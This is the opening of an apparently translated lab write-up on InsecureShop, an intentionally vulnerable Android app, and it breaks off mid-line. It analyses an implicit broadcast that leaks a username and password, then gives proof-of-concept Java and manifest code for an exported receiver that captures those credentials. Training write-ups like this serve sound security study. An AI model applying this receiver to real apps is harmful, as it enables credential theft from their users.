Table of contents
- Vulnerability #9 - Using implicit intent to send broadcast with sensitive data
- Vulnerability #10 - Intercepting implicit intents to load arbitrary URLs
- poc writing
- Vulnerability #11 - Insecure implementation of SetResult in exported Activity
- Vulnerability #12 - Insecure Content Provider
- Bug #13 - Lack of SSL Certificate Verification
- Vulnerability #14 - Insecure Data Storage
- Bug #15 - Insecure Logging
Vulnerability #9 - Using implicit intent to send broadcast with sensitive data
1. Vulnerability analysis
AboutUsActivity.class
can see that a broadcast is implicitly sent through the action, and the content is the user name and password.
How is this onSendData triggered? Check the source code again and find that there is no direct call in the current source code file.
It is suspected that the call may be made elsewhere. Check the layout file activity_about_us.xml.
In the layout file, the onclick event of the button element is associated with the onSendData method.
2.poc writing
2.1 poc Android apk targetSdkVersion <=25-declared in the dependency list
如果目标targetSdkVersion <=25
If you want to receive implicit broadcasts, you can declare registration in androidManifest.xml
<receiver>
android:name=".vul_broadcastReciever.MyReceiver"
android:enabled="true"
android:exported="true">
<intent-filter>
<action android:name="com.insecureshop.action.BROADCAST"/>
</intent-filter>
</receiver>
MyReceiver.class
public class MyReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if (intent != null){
String action = intent.getAction();
if ("com.insecureshop.action.BROADCAST".equals(action)){
String username = intent.getStringExtra("username");
String password = intent.getStringExtra("password");
if (username != null && password != null ) {
// 通过显示intent发送数据到activity中
Intent intent1 = new Intent(context,Vul_getDataFromBroadcast.class);
intent1.putExtra("username",username);
intent1.putExtra("password",password);
context.startActivity(intent1);
}
}
}
}
}
Vul_getDataFromBroadcast.class
// 接收数据
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra(&#